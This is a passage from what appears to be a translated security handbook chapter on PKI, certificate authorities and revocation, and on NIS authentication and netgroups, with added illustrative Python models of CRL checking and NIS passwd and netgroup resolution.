The use of digital certificates and a public key infrastructure (PKI)[133] is an attempt to tie identities to digital signatures. A digital certificate is a special kind of digital signature - a digital signature that comes with an identity and is designed to be interpreted automatically by computers. A PKI is a collection of technologies and policies for creating and using digital certificates. The effectiveness of these systems depends on combining three things at once: carefully written public key cryptography, policies that are rigorously enforced and maintained, and a legal system that guarantees the policies are properly followed. PKI is discussed in detail later in this chapter.
The problem of digital identification by public key is a deep philosophical one. How can you be sure that a public key belongs to the person or organization whose name is on the key? How can one become certain about something uncertain? Because definite rules and procedures are followed in creating and protecting them, in practice we can know something about the identity of key holders and the validity of digital certificates.
There are three principal ways to make sure that a public key really belongs to the person who claims to own it:
1. Obtain the public key directly from the person and verify it in a way that leaves you completely sure of it.
2. Make sure that another person whom you trust has verified the key.
3. Make sure that a reputable and trusted authority has certified the key.
Verifying a Key Personally
One way to make sure that you have the public key of "Jean Trocard" is to meet with Jean, ask Jean to read the key aloud, and compare it digit by digit with the one you have. If you know Jean well and also trust the telephone system, you can make this comparison over the telephone - but not over the Internet, where someone could intercept the comparison and substitute the digits of a forged key.
Because public keys are made up of very long numbers, comparing them digit by digit is tedious. Instead, you and Jean can each compute a cryptographic message digest of the key and compare the characters of the two digests. These digests are usually called "key fingerprints". Some users of public key cryptography print their key fingerprints on their business cards, so if you received the business card directly from Jean, you can later download Jean's public key and verify it.
133 Public Key Infrastructure
Certifying the Keys of Other People
Once you have established that Jean's key really belongs to Jean, you may be willing to accept other public keys that Jean vouches for. Jean can vouch for other people's keys by signing them with Jean's own key, and when you receive a key signed by Jean's key, you can be confident that Jean signed it, because you know that Jean's key is valid and you have assumed that only Jean has access to it.
Accepting the keys that Jean vouches for does not rest on the validity of Jean's key, but on how much you trust Jean to be careful about the keys Jean signs. In most public key systems these two notions - the validity of a key and your trust in its owner - are independent of each other. In some systems, you can wait for confirmation from two or more trusted parties before accepting any key as valid.
PGP users commonly hold signing parties[134] to check one another's keys and sign them. A public key in such a group may carry ten or more signatures, which someone can later use to assess the validity of that key. PGP users usually distribute their keys through PGP key servers around the world, so when you download a key from a key server, you can use the signatures to see whether you are satisfied that the key really represents the person who claims to own it.
Certification Authorities: Third-Party Registrars
Although "signing parties" are a good way for individuals to build trust, experience has shown that chaining signatures in this way is not a practical method for building a national database of certified public keys, because its coverage will usually be very thin. Some people do not have the time to go to signing parties. In addition, having someone's signature on a person's key shows that the two people know each other, or at least that they have met. For this reason, in most cases, large-scale use of public key cryptography ends up as a tree of certificates with a certification authority (CA)[135] at its root. A "certification authority" is a person or organization that issues digital certificates.
A certification authority can set standards that must be met before it signs a key. For example, a university might verify that the key it is about to sign really belongs to a bona fide student. Another certification authority might have no standards at all. The world's largest certification authority - VeriSign - issues several different kinds of certificates. Under the VeriSign Trusted Network (VTN)[136] it issues certificates for public use. The company also issues certificates for use within companies. The lowest level of certificates issued by VTN offers no assurance at all, but the highest levels warrant that VTN identified the key holder before issuing the certificate.
Certificates signed by certification authorities are like identity documents that have been signed cryptographically. These certificates contain the user's identifying information, signed with the certification authority's own private key, and they also include information such as the authority's name, the authority's public key, and a serial number. To date, most CA certificates are certificates vouching that a particular public key belongs to a particular person or organization. Certificates can also be used as proof, as in the university example mentioned earlier. The services of a certification authority can be used in different ways:
134 Signing Parties
135 Certification Authority
136 VeriSign Trusted Network
Internal Certification Authority
An organization can use a certification authority to certify its own employees. Certificates issued by an internal CA can specify a person's name, position, and level of authority. These certificates can be used inside the organization to control access to internal resources and the flow of information. The internal CA can serve as the foundation of the organization's public key infrastructure.
Companies can also use an internal certification authority that issues certificates to customers. For example, several stock exchanges have required their customers to obtain the necessary certificates before being allowed to make high-value trades over the Internet.
Outsourced Certification Authority
An organization may want to share in the benefits of using digital certificates but lack the technical ability to set up the service itself. Such an organization can contract with an outside organization to provide certification services for its employees and customers, just as a company contracts with a photo lab to issue identification cards.
Trusted Third-Party Certification Authority
A company or government agency can use a third-party certification authority to bind public keys to the legal names of individuals and companies. Such a CA can allow people who have had no prior relationship with one another to establish their identities to each other and engage in legal transactions. Certificates issued by a worldwide certification authority can be the equivalent of the driver's licenses and identity cards issued by a government.
Clearly, certification authorities whose keys are not preinstalled in web browsers or operating systems are at a disadvantage. Although Microsoft and Netscape now open their browsers to any CA that can meet their certification requirements, the original web browsers were distributed with a small number of carefully selected CA keys. Having these keys bundled in those programs was a great advantage for the CAs that issued them and an obstacle for everyone else.
To use the certificates issued by a certification authority, you must have a copy of that authority's public key. Public keys are issued with certificates of their own. At present most of these certificates are preinstalled in web browsers and operating systems. CA public keys can also be added manually by the end user.
Certification Practices Statement (CPS)
A certification practices statement (CPS)[137] is a legal document published by a certification authority that describes its policies and procedures for issuing and revoking digital certificates. A CA's CPS makes clear what it means for that CA to certify a key.
CPS documents are designed to be read by humans, not machines. A business may be willing to accept the certificates of a certification authority that guarantees minimum certification policies and assumes a certain level of liability if the certification policies are not followed - and may require that the CA be bonded by a reputable organization.
X.509 v3 Certificates
Although certification authorities can issue any kind of certificate, in practice most of them issue certificates that conform to the X.509 v3 standard. Likewise, most cryptographic programs and protocols, including SSL, are designed to work only with X.509 v3 certificates. The one notable exception is PGP, which uses its own certificate format, although recent versions also support some X.509 certificates. (The SSH program does not use certificates, but instead relies on users to verify keys personally.)
Each X.509 certificate contains a version number, a serial number, identity information, algorithm-related information, and the signature of the issuing authority. The industry adopted X.509 v3 certificates in place of the original X.509 certificates because the X.509 v3 standard allowed arbitrary "name" and "value" pairs to be included in the standard certificate. These pairs can be used for many purposes and allow the use of certificates to be extended without changing the underlying protocol.
Types of certificates
Four types of digital certificate are in use on the Internet today:
Certification authority certificates
These certificates contain the public keys and names of CAs, or the name of the particular service for which the certificate is issued. They are usually "self-signed" - that is, signed with the CA's own private key. CAs can also certify one another in a chain or sign one another's keys. Exactly what such chained certifications mean is still an open question. Microsoft Windows, Microsoft Internet Explorer, Netscape Navigator, and OpenSSL are all distributed with more than ten certificates from various CAs.
In the list of CAs distributed with web browsers, several companies have more than one certificate. VeriSign, with more than 20 different certificates, has the most. Signatures made with different private keys represent different levels of assurance and trust.
Server certificates
These certificates contain the public key of an SSL server, the name of the organization that runs the server, and the server's DNS name. Every information server on the Internet that supports encryption must have a server certificate for the SSL protocol to work properly. Although the main purpose of issuing these certificates is to help clients establish the identity of web servers and to prevent man-in-the-middle[138] attacks, in practice server certificates are used more for encryption than for authenticating the server.
137 Certification Practices Statement
Personal certificates
These certificates contain a person's name and public key. They can also include other information such as the person's e-mail address, postal address, and date of birth. They are issued by organizations to their employees or customers. Personal certificates are inherently a more secure way for people to identify themselves on the Internet than a username and password. They are also required by users of the S/MIME e-mail encryption protocol.
Software publisher certificates
These certificates are used to verify signatures on distributed software, such as ActiveX components and executable files that can be downloaded from the Internet. Each recent version of the Windows operating systems has shipped with a number of software publisher certificates, each of which can be used to validate the signatures on Windows applications.
Minimal disclosure certificates
Digital certificates carry a threat to the privacy of their users. When you present a certificate to a server, the server can easily record all the identity information on the certificate (whether or not the server needs it to authenticate you). In many cases an organization that obtains this information in the course of business is free to do whatever it likes with it.
One way to minimize this privacy threat is to use minimal disclosure certificates[139]. These certificates let their holders selectively reveal particular parts of the certificate without revealing the rest. For example, a woman who wants to log in to the website of a cancer victims' group could use a minimal disclosure certificate to prove to the site that she is a woman over 21 who has breast cancer, without revealing her name or address. The concept of minimal disclosure certificates was invented by a mathematician named Stefan Brands[140], and in February 2000 it was exclusively licensed to the Canadian company Zero Knowledge Systems[141].
Revocation
In addition to issuing certificates, a CA must be able to revoke a certificate if it learns that it has made a mistake or that the private key has been misused. Likewise, when a subscriber's period of validity ends, that subscriber's certificate must be revoked.
The need for a practical revocation mechanism became fully clear in March 2001, when Microsoft announced that in January VeriSign had issued two certificates to an individual who falsely claimed to be a Microsoft employee, and that the company name recorded in both certificates was Microsoft Corporation. Microsoft noted that "the ability to sign executable files using keys that purport to belong to Microsoft could be of great benefit to attackers who want to induce users to agree to run those files."[142]
138 Man-in-the-Middle
139 Minimal Disclosure Certificates
140 Stefan Brands
141 http://www.wired.com/news/technology/0,1282,34496,00.html
Certificate revocation lists
One approach to revocation is to publish a certificate revocation list (CRL)[143]. A CRL is a list of all the certificates that have been revoked by the CA but have not yet expired for other reasons. Ideally, every CA publishes a CRL at regular intervals. Besides listing the revoked certificates, the CRL states how long it is itself valid and how to obtain the next CRL.
At present, X.509 v3 certificates must contain a field called the CRL distribution point (CDP)[144]. In theory, a program that wants to verify the validity of a certificate should be able to download a CRL from the relevant CDP to determine whether the certificate has been revoked. Since most certificates are issued by a small number of CAs, it is reasonable to imagine that a program could download a fresh CRL every day or every hour and then keep the list in memory for successive lookups. An organization with limited Internet connectivity could download the CRL once and distribute it among its users.
In practice, CRLs and CDPs have several problems:
• If the CA is very popular, its CRLs are likely to be very large. Downloading a CRL of, say, 900 kilobytes over a dial-up connection to the SSL server of the VeriSign certification authority can take more than 20 minutes;
• There is a window between the time a certificate is revoked and the time the new CRL is distributed, during which the certificate appears to be valid although it is not; and
• Many programs do not implement CRLs and CDPs correctly.
In the case of the fraudulent Microsoft certificates mentioned earlier, the bogus certificates were revoked and appeared in VeriSign's CRL, but unfortunately the certificates that VeriSign had issued did not contain valid CDPs. (According to VeriSign, because of a bug in the Authenticode implementation distributed with Internet Explorer 3.02, Authenticode certificates do not contain CDPs.) Without a CDP, a program that tried to verify the validity of the bogus certificate did not know where to obtain the CRL on which the revoked certificates were listed.[145]
Real-time certificate validation
An alternative to CRLs is to validate certificates in real time. Whenever a certificate needs to be validated, the CA is consulted online. Real-time validation systems solve the CRL problem neatly, although they need a reliable and trustworthy network.
142 http://www.microsoft.com/technet/security/bulletin/MS01-017.asp
143 Certificate Revocation Lists
144 CRL Distribution Point
145 In the end Microsoft had to issue an operating-system patch to solve the problem. The fix contained an additional CDP that made Internet Explorer obtain its information from a local CRL in order to validate certificates, together with a CRL listing the two certificates that VeriSign had issued in error.
The first problem with real-time certificate validation systems is scale. As certificates gain more and more users, the validation servers need to become faster and faster to serve the growing user community. In addition, real-time systems are vulnerable to denial-of-service attacks. If a business cannot reach the revocation server, how should it treat a certificate? Should it trust the certificate, or give it no credence? If the default is to trust, an attacker can flood the revocation server with a very large number of bogus requests so that it is out of action at the moment an invalid certificate is used. If the default is to distrust, an attacker can use denial-of-service attacks to make the revocation server unavailable, so that all transactions are rejected and the company's reputation is quickly damaged.
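The trade-offs described in the two sections above (a cached CRL that is still inside its validity period, a certificate with no CDP, and the trust-or-distrust default when the revocation source cannot be reached) can be made concrete with a small model of a relying party. This is an added example, not code from the handbook: the class names, serial numbers, dates and the crl.example.test URL are constructed, and `FakeCDP` is a hypothetical stand-in for a real CRL download.

```python
"""Model of a relying party's revocation check. All data below is constructed."""
from dataclasses import dataclass
from datetime import datetime, timedelta
from enum import Enum
from typing import Callable, Optional


class Status(Enum):
    GOOD = "good"
    REVOKED = "revoked"
    UNKNOWN = "unknown"          # revocation state could not be determined


@dataclass(frozen=True)
class Cert:
    serial: int
    cdp: Optional[str]           # CRL distribution point URL; None if the field is absent


@dataclass(frozen=True)
class CRL:
    this_update: datetime
    next_update: datetime        # after this moment the list may no longer be relied on
    revoked: frozenset


class FakeCDP:
    """Constructed stand-in for a CA's distribution point (hypothetical downloader)."""
    def __init__(self, crl: CRL):
        self.crl, self.up = crl, True

    def __call__(self, url: str) -> CRL:
        if not self.up:
            raise OSError("distribution point unreachable")
        return self.crl


class RevocationChecker:
    def __init__(self, fetch: Callable[[str], CRL], fail_open: bool):
        self.fetch = fetch
        self.fail_open = fail_open   # True: accept when the status is UNKNOWN
        self.cache = {}              # CDP URL -> most recent CRL downloaded

    def status(self, cert: Cert, now: datetime) -> Status:
        if cert.cdp is None:
            return Status.UNKNOWN    # no CDP: the checker does not know where the CRL is
        crl = self.cache.get(cert.cdp)
        if crl is None or now >= crl.next_update:
            try:
                crl = self.cache[cert.cdp] = self.fetch(cert.cdp)
            except OSError:
                pass                 # keep the stale copy, if there is one
        if crl is not None and cert.serial in crl.revoked:
            return Status.REVOKED    # a listed serial is rejected even from a stale list
        if crl is None or now >= crl.next_update:
            return Status.UNKNOWN    # absence from an expired list proves nothing
        return Status.GOOD

    def accept(self, cert: Cert, now: datetime) -> bool:
        st = self.status(cert, now)
        return self.fail_open if st is Status.UNKNOWN else st is Status.GOOD


def demo():
    t0, hour, day = datetime(2001, 3, 1), timedelta(hours=1), timedelta(days=1)
    url = "http://crl.example.test/ca.crl"
    cdp = FakeCDP(CRL(t0, t0 + day, frozenset()))
    good, bogus, no_cdp = Cert(1001, url), Cert(1002, url), Cert(1003, None)
    strict = RevocationChecker(cdp, fail_open=False)
    lenient = RevocationChecker(cdp, fail_open=True)
    out = {"before": strict.status(bogus, t0 + hour)}
    # The CA revokes 1002 two hours in, but the client's cached CRL is valid for a day.
    cdp.crl = CRL(t0 + 2 * hour, t0 + day + 2 * hour, frozenset({1002}))
    out["window"] = strict.status(bogus, t0 + 3 * hour)
    out["after_refresh"] = strict.status(bogus, t0 + day)
    out["no_cdp"] = (strict.accept(no_cdp, t0), lenient.accept(no_cdp, t0))
    cdp.up = False                   # the distribution point is unreachable
    late = t0 + 3 * day
    out["outage_strict_rejects_good"] = strict.accept(good, late)
    out["outage_lenient_accepts_bogus"] = lenient.accept(bogus, late)
    out["outage_strict_bogus"] = strict.status(bogus, late)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:30} {value}")
```

The `window` result is the gap between revocation and the next CRL, and the two `outage_*_good`/`outage_*_bogus` acceptance results are the two defaults the text weighs: the strict checker turns an outage into rejected valid certificates, the lenient one into accepted revoked ones.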
Public key infrastructure
Public key infrastructure (PKI) comprises the system of digital certificates, the certification authorities, and the tools, systems, and hardware that are used to deploy public key technology.
Many early proponents saw PKI as a centralized system that would have to be implemented by governments, so that digital certificates would be endorsed by governments in the same way as birth certificates and passports. That vision was worth examining, but whatever its merits, it has not been implemented to date. Companies such as VeriSign have issued millions of certificates to establish the identity of individuals and organizations, and the signing keys for these certificates have been distributed on a wide scale. Some of these trust hierarchies - such as the hierarchy used to validate web server certificates - are currently used by more than a hundred million people; but they are run by private businesses, not by government. The word "public" in PKI likewise refers to the public keys used in these certificates, not to the public at large.
Problems with today's certification authorities
Regrettably, if you look closely at the root certificates built into Internet Explorer and Netscape Navigator, you will find that today's CAs suffer from major inconsistencies and quality-control problems.
Short-lived access to certification practices statements
Unfortunately, many CA certificates refer to CPSs that are no longer accessible. For example, the self-signed certificate of Autoridad Certificadora del Colegio Nacional de Correduria Publica Mexicana, A.C., which is distributed with Internet Explorer 5.0, is valid from June 1999 to June 2009. This certificate claims that its CPS is available at http://www.correduriapublica.org.mx/RCD/dpc, yet that URL was not accessible in April 2001 at least.
It is very important for a CA to keep alive all the URLs that appear in every certificate it has issued. If a CA changes its CPS, then each CPS should be obtainable from its own unique URL. These links must remain accessible for the whole validity period of every certificate that refers to that CPS, because the legal meaning of the certificate cannot be determined without reading the CPS. Moreover, because the meaning of a signature may be called into question several years after it was made, the URLs should as a rule remain active for at least 20 years.
Inconsistencies in certificate fields
The certificates built into Netscape Navigator and Internet Explorer are meant to serve as the foundation for the world's electronic commerce infrastructure and for concluding legal agreements. What complicates this goal is the fact that different organizations use certificate fields in widely varying ways. More precisely, the "Subject" field, which identifies the issuer through its distinguished name[146], has no standard format, and the certificate of a different CA may contain an entirely different set of distinguished-name attributes. If certificates are to be processed programmatically by software, a binding convention for the use of the distinguished name and the other fields is vital. Without such a convention, certificates have to be examined visually by people who have been trained to recognize every conceivable type and format of legitimate name, so that valid certificates can be told apart from invalid ones.
Unrealistic expiration dates
Early versions of the Netscape Navigator browser were distributed with certificates whose expiration dates fell between 25 and 31 December 1999. These products stayed in use far longer than had been expected. At the end of 1999 many of these products, which still carried the old certificates, stopped working. Although it should have been possible simply to download new certificates, because of other security problems in these early products users were advised to upgrade the entire application. Many users were unhappy that software they depended on had suddenly stopped working.
After this experience, many CAs made a decision that led them to err in the other direction. They began distributing certificates with very long lifetimes. All the certificates distributed with Internet Explorer 5.0 are 1024-bit RSA certificates, yet more than half of them have expiration dates after 1 January 2019. VeriSign has also distributed eight certificates that expire in 2028 with Internet Explorer 5.5. Many cryptographers believe that 1024-bit RSA will no longer be considered a secure cryptosystem by that date.
PKI policy issues
The need for a widespread public key infrastructure is unavoidable. The number of fraud incidents on the Internet is rising, and the need to use digital signatures for commerce is growing. Even so, a widespread PKI seems further away today than it did in the mid-1990s. That private keys and digital certificates should be used to prove identity is a thoroughly accepted idea among computer security professionals, yet when the digital signature at the end of an e-mail message fails to verify, these same professionals pick up the telephone and call one another to make sure, for no other reason than that the technology, for all its simplicity, runs into unwanted and unpredictable problems.
What follows covers a few of the problems that must be confronted in building a real PKI.
Private keys are not people
Digital signatures make proof of identity easier, but they are not in themselves proof of identity. Unless the private key is generated randomly and stored in such a way that only one person can use it, the whole process is open to doubt. Unfortunately, both key generation and key storage depend on the security of the end user's computer, and we know that most computers that run Netscape Navigator or Internet Explorer are not secure. Many of these computers run software downloaded from the Internet without adequate knowledge of its source. Some of them are infected with viruses, some downloaded programs contain pre-installed Trojans, and the common operating systems and browsers have serious bugs, for which hundreds of security patches have been issued in recent years. It is therefore possible that a network-connected system has been compromised by unknown parties in the recent past. Widespread use of smart cards and card readers may make it harder to steal people's private keys, but it does not make it impossible.
146 Distinguished Name
Distinguished names are not people
Protecting private keys is not enough to establish trust in a PKI. How do you determine that the name in the "distinguished name" field is actually correct? Every CA undertakes to follow its published certification policies when it certifies someone's digital signature. How do you know that the CA's policies guarantee that the distinguished name on the certificate really belongs to the person they think it belongs to?
How do you evaluate the trustworthiness of a CA? Should CAs be private companies, or the opposite? It is well established that governments have issued false passports when it suited their interests. Could a CA likewise set its own policies aside and issue fraudulent digital identity documents? And how do you compare one of these CAs with another? To reassure customers, some CAs obtain third-party certifications such as SAS 70[147] (Service Auditor Report)[148] or WebTrust for Certification Authorities[149] (Attestation Report)[150]. The Information Security Committee of the American Bar Association[151] has published a book titled PKI Assessment Guidelines[152], but few users have the skill or the opportunity to evaluate the CAs that use these guidelines.
In theory, many of these questions can be resolved by creating standards, audits, and formal accreditation systems. Regulation can also be used to create standards; in practice, however, the efforts made so far are not very promising.
147 Statement on Auditing Standards No. 70 (SAS 70), for service organizations, is an international standard developed by the American Institute of Certified Public Accountants (AICPA). A SAS 70 assessment confirms that a service organization has had its control objectives and control activities examined and endorsed by an independent accounting and auditing firm.
148 Service Auditor Report
149 Under the WebTrust certification for networks, a qualified and independent auditor uses a set of accepted principles to find out whether an operating certification authority meets the minimum conditions for disclosure, policy, practices, and control procedures.
150 Attestation Report
151 American Bar Association Information Security Committee
152 PKI Assessment Guidelines
There are too many Robert Smiths
What do you do with a certificate that says it belongs to "Robert Smith"? How do you know which Robert Smith it belongs to? Clearly a certificate must hold more information about a person than just a name; that is, it must contain enough information to identify the person legally and uniquely. Even so, you (the person who wants to trust Robert Smith's certificate) may not know this additional information - so for you there are still too many Robert Smiths. Of course, if these digital certificates had fields for a person's age, sex, or photograph, Internet users would say that their privacy is violated when these identifiers are disclosed without the user's consent, and they may well be right. Preventing this is the main strength of an identity card: removing anonymity while at the same time preserving privacy, and thereby producing identity and accountability.
Digital certificates make data aggregation easier
Over the past two decades, universal identifiers - such as the U.S. Social Security number - have become a tool for the systematic violation of people's privacy. Universal identifiers can be used to aggregate information from different sources and to build comprehensive dossiers on individuals. Digital certificates issued from a central location could potentially be a far better tool for aggregating information than the Social Security number, because they remove the greatest weakness of Social Security numbers - inaccurate information. People sometimes give a wrong Social Security number on purpose, and sometimes they mistype it; with digital certificates, that option is taken away from them.
Today, when two companies try to match up an individual's identifying information, the process usually runs into trouble because the numbers do not match. Digital certificates, by their very design, make this process simple. As a result, it becomes more likely that large databases of personal information aggregated from many sources will be built.
How do you lend a key?
Suppose you are ill in hospital and you want your friend "Carl" to go to your office and fetch your e-mail. To do this you have to give him your private key. Should you do so? Should you revoke your key once the job is done? Suppose a user is having trouble with a piece of software: it fails when he uses private key A but works when he uses private key B. Should he be legally allowed to give a copy of private key A to the software developers so that they can find out what is wrong with the program? Or would he not be putting the integrity of the public key infrastructure at risk by doing so?
Now suppose that the private key does not belong to a particular person but to a role that the person holds in a company. Consider, for example, a private key that is used to sign purchase orders. Is it right for two people to hold that private key? Or should the company create two private keys - one for each of the people who need to sign purchase orders?
Network authentication
Many solutions have been proposed to the problem of authenticating users in environments where a number of workstations, connected to one another over an unreliable and probably insecure network, are available to users. For simplicity we would prefer to store user account information on one central server, but for reliability we may want that central server's information to be replicated on other servers in real time. For security reasons we need to be sure that when a user logs in to a workstation, the user's identity is verified against the central server's information without exposing confidential information on the untrusted network. Although solutions to this problem have been offered - such as NIS, NIS+, Kerberos, and LDAP - none of them has been adopted universally and definitively. NIS and NIS+ were used at first in environments with many Unix workstations; Kerberos and LDAP, in addition to those environments, form an important part of the operating systems based on Windows NT.
Sun Network Information Service
One of the oldest and best-known distributed database administration systems is Sun's Network Information Service (NIS)[153]. A few years later NIS+ was released, an improved but more complex version of NIS. More recently, LDAP (Lightweight Directory Access Protocol)[154] servers have become more popular, and Sun users are now moving to LDAP-based services. Although Sun has asked its users, for security reasons, not to use NIS, it is still used in many environments.
NIS is a distributed database system that lets many computers share password files, group files, host tables, and other files over the network. Although the files appear to exist on each of the computers, they are in fact stored on only one computer, called the NIS master server (and possibly replicated on a backup or secondary server). The other computers on the network - the NIS clients - can use the databases stored on the master server (such as the password file) as if the information were stored locally. These databases are called NIS maps[155].
With NIS a large network is easier to administer, because all the account and configuration information is stored on one computer while remaining usable on every system on the network.
Some files are replaced by their corresponding NIS maps, and others have the map data added to them. For these files, NIS uses the plus sign (+) to tell the system to stop reading the file (for example /etc/passwd) and to start querying the NIS server for the appropriate NIS map (such as passwd). The server usually maintains several maps, each based on one of the files stored in the /etc directory, such as /etc/passwd, /etc/hosts, and /etc/services.
For example, the /etc/passwd file on a client might look like this:
root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh
+::999:999:::
This causes a program that reads /etc/passwd on the client to issue a network request to read the passwd map from the server. The passwd map is usually built from the /etc/passwd file on the server, although this is not always the case. When NIS scans the /etc/passwd file, it stops at the first line that matches. You can restrict the import of accounts to particular users by adding a username after the "+" sign. You can also exclude particular usernames from being imported by inserting a line that begins with a minus sign (-).
NIS also lets you selectively import some fields from the /etc/passwd database. For example, if you have the following entry in /etc/passwd:
root:si4NOjF9Q8JpE:0:1:Mr. Root:/:/bin/sh
+:*:999:999:::
then all the entries in the NIS passwd map will be imported, but each will have its password field replaced with "*", which prevents it from being used on the client machine. All the UIDs and account names are still picked up, so that file listings show the owners of files and directories as usernames. This entry also lets ~user in the various shells map correctly to the user's home directory (assuming that the directory is mounted using NFS).
153 Network Information Service
154 Lightweight Directory Access Protocol
155 NIS Maps
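How a client's /etc/passwd lines select NIS accounts (first matching line wins, `+name`, `-name`, and a `*` in the password field) can be checked with a small resolver before a file is deployed. This is an added example, not code from the handbook or from any NIS implementation; it goes one step further and also accepts `+@netgroup` and `-@netgroup` selectors, takes the NIS map and the netgroup membership as constructed dictionaries, and assumes that UID/GID values on a `+` line are ignored.

```python
"""Model of how a client resolves logins from /etc/passwd lines that pull in NIS entries."""
FIELDS = ("name", "passwd", "uid", "gid", "gecos", "home", "shell")
OVERRIDABLE = ("passwd", "gecos", "home", "shell")  # assumption: uid/gid on a + line are ignored


def _record(line, source):
    parts = (line.split(":") + [""] * 7)[:7]
    return dict(zip(FIELDS, parts), source=source)


def lookup(name, passwd_text, nis_map, netgroup_users):
    """Resolve one login name; the first matching line in the file decides the outcome."""
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        entry = _record(line, "local")
        key = entry["name"]
        if key[:1] not in ("+", "-"):
            if key == name:
                return entry                  # ordinary local account
            continue
        selector = key[1:]
        if selector.startswith("@"):
            hit = name in netgroup_users.get(selector[1:], ())
        else:
            hit = selector == name or (selector == "" and key[0] == "+")
        if not hit:
            continue
        if key[0] == "-":
            return None                       # explicitly excluded, stop here
        if name not in nis_map:
            continue
        record = _record(nis_map[name], "nis")
        for field in OVERRIDABLE:             # non-empty fields on the + line override NIS
            if entry[field]:
                record[field] = entry[field]
        return record
    return None


def usable_logins(passwd_text, nis_map, netgroup_users):
    """Names that resolve on this client with a password field other than '*'."""
    local = {l.split(":")[0] for l in passwd_text.splitlines()
             if l.strip() and l[0] not in "+-"}
    usable = []
    for name in sorted(local | set(nis_map)):
        record = lookup(name, passwd_text, nis_map, netgroup_users)
        if record is not None and record["passwd"] != "*":
            usable.append(name)
    return usable


ROOT = "root:si4NOjF9Q8JqE:0:1:Mr. Root:/:/bin/sh"      # local line as shown in the text
NIS_PASSWD = {                                          # constructed NIS passwd map
    "alice": "alice:CONSTRUCTED-HASH-A:1001:100:Alice:/home/alice:/bin/sh",
    "bob": "bob:CONSTRUCTED-HASH-B:1002:100:Bob:/home/bob:/bin/sh",
    "mallory": "mallory:CONSTRUCTED-HASH-M:1003:100:Mallory:/home/mallory:/bin/sh",
}
NETGROUP_USERS = {"operators": {"alice", "bob"}}        # constructed, already expanded
CLIENT_FILES = {
    "import_all": ROOT + "\n+::999:999:::\n",
    "names_only": ROOT + "\n+:*:999:999:::\n",
    "operators_minus_bob": ROOT + "\n-bob\n+@operators::999:999:::\n",
    "exclusion_too_late": ROOT + "\n+@operators::999:999:::\n-bob\n",
}


def report():
    return {label: usable_logins(text, NIS_PASSWD, NETGROUP_USERS)
            for label, text in CLIENT_FILES.items()}


if __name__ == "__main__":
    for label, names in report().items():
        print(f"{label:22} {names}")
```

The `exclusion_too_late` file shows why an exclusion line has to come before the line that imports the account: with the order reversed, `bob` is matched by the import first and stays usable.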
NIS domains
When you configure an NIS server, you must specify an NIS domain[156]. These domains are not the same as DNS domains. DNS domains designate a region of the Internet, whereas NIS domains designate an administrative group of computers. The Unix domainname command is used to display and change the name of a domain. A computer can be in only one NIS domain at any one time, but it can serve any number of NIS domains.
Do not use your Internet domain as your NIS domain. Setting these two domains to the same name has caused problems with some versions of sendmail. In addition, using an NIS domain name that is easy to guess creates security risks. The tools of intruders who try to exploit flaws in NIS and NFS almost always try variations of the Internet domain name as the NIS domain name before they try anything else. (Of course, the NIS domain name can still be determined by other means.)
NIS netgroups
With NIS netgroups[157] you can create groups of users or of machines on the network. Netgroups are in principle similar to local user groups, but much more complex.
The primary purpose of netgroups is to simplify configuration files and to reduce the chance of error. By defining netgroups and using them correctly, you can raise the security level of the system by restricting the individuals and machines that have access to critical resources.
The netgroup database is kept on the NIS master server in the file /usr/etc/netgroup or /etc/netgroup. This file consists of one or more lines of the following form:
Groupname member1 member2 …
Each member can specify a host and an NIS domain. Members have this form:
(hostname, username, domainname)
If the username is left empty, then every user on the named host is a member of the group. If the domainname is left empty, then the current domain is assumed.[158]
Setting up netgroups
The /etc/yp/makedbm program (sometimes located at /usr/etc/yp/makedbm) processes the netgroup file into a number of database files, which are stored at the following paths:
/etc/yp/domainname/netgroup.dir
/etc/yp/domainname/netgroup.pag
/etc/yp/domainname/netgroup.byuser.dir
/etc/yp/domainname/netgroup.byuser.pag
/etc/yp/domainname/netgroup.byhost.dir
/etc/yp/domainname/netgroup.byhost.pag
Note that on some machines /etc/yp may be a symbolic link to /var/yp.
156 NIS Domain
157 NIS Netgroups
158 The best approach is to build netgroups in which every member either has a username (a netgroup of users), or has a hostname but no username (a netgroup of hosts). Building netgroups in which some members are users and some are hosts increases the likelihood of error.
If you have a small organization, you can create just two netgroups: one for all the users and one for all the client machines. These groups make it easier to create and administer your system's configuration files.
If you have a larger organization, you can create several groups. For example, you can create one group for the users of each department. You can then have a master group that contains all the other subgroups. You can of course do the same thing for computers.
Consider a science department with a structure like the following:
Math (mathserve,,) (math1,,) (math2,,) (math3,,)
Chemistry (chemserve1,,) (chemserve2,,) (chem1,,) (chem2,,) (chem3,,)
Biology (bioserve1,,) (bio1,,) (bio2,,) (bio3,,)
Science Math Chemistry Biology
Netgroups matter for security because you use them to restrict which users and machines on the network have access to the information stored on your computers. To limit the data that is imported into a system, you can use netgroups in NFS files to restrict who has access to partitions and to data files such as /etc/passwd.
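Because netgroups decide who reaches critical resources, it helps to expand a netgroup file and check it before the maps are rebuilt. The following added example (not code from the handbook or from the NIS tools) parses the format shown above, flattens nested groups such as Science, rejects undefined names and cycles, and flags groups that mix user and host members or contain an all-empty `(,,)` member; the last three groups in the sample and the use of `#` for comments are assumptions made for the illustration.

```python
"""Parse a netgroup file, flatten nested groups, and flag risky definitions."""
import re

TOKEN = re.compile(r"\(([^()]*)\)|([^\s()]+)")   # a (host,user,domain) triple or a bare name


def parse_netgroup(text):
    """Return {group: [member, ...]}; a member is a 3-tuple or the name of another group."""
    groups = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # assumption: '#' starts a comment
        if not line:
            continue
        tokens = TOKEN.findall(line)
        if not tokens or not tokens[0][1]:
            raise ValueError(f"line does not start with a group name: {raw!r}")
        members = groups.setdefault(tokens[0][1], [])
        for triple, ref in tokens[1:]:
            if ref:
                members.append(ref)              # reference to another netgroup
                continue
            fields = tuple(f.strip() for f in triple.split(","))
            if len(fields) != 3:
                raise ValueError(f"{tokens[0][1]}: malformed member ({triple})")
            members.append(fields)
    return groups


def expand(groups, name, _path=()):
    """Flatten a group into its set of triples; undefined names and cycles are errors."""
    if name in _path:
        raise ValueError("netgroup cycle: " + " -> ".join(_path + (name,)))
    if name not in groups:
        raise ValueError(f"undefined netgroup: {name}")
    triples = set()
    for member in groups[name]:
        if isinstance(member, tuple):
            triples.add(member)
        else:
            triples |= expand(groups, member, _path + (name,))
    return triples


def kind(triple):
    host, user, _domain = triple
    return "user" if user else "host" if host else "wildcard"


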